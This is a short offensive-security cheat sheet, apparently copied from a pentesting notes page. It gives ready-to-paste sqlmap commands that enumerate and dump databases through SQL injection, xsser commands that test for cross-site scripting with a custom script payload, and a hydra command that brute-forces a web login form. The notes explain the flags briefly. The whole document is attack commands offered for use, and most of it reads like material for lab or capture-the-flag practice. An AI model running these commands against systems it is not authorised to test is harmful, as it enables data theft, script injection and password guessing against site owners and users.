Copy sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something --dbs
Copy sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DATABASE_NAME --tables
Copy sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DB_NAME -T TABLE_NAME --columns
Copy sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DB_NAME -T TABLE_NAME -C col1,col2 --dump
Copy sqlmap -r $filename -p something
# -r is the filename where response is stored
# -p is the target variable where u wanna check sql injection
Copy xsser --url "$url/something=XSS&other_value=eg" --cookie "COOKIE"
#use cookie if needed
#XSS in the url will be the target variable
Copy xsser -u "$url/something" -p "post_req=XSS&other_data=idk"
#XSS represents target variable in -p
Copy xsser -u "$url/something" -p "post_req=XSS&other_data=idk" --auto
Copy xsser -u "$url/something" -p "post_req=XSS&other_data=idk" \
-Fp "<script>your_payload</script>"
Copy hydra -L users.txt -P passwd.txt $IP http-port-form \
"/page.php:user_name=^USER^&pass_name=^PASS^&other_params:Invalid creds error msg"
#the user_name and pass_name are the names used in the form (name=)
#you can just paste that line with the one u get in burp request and then change
#^USER^ and ^PASS^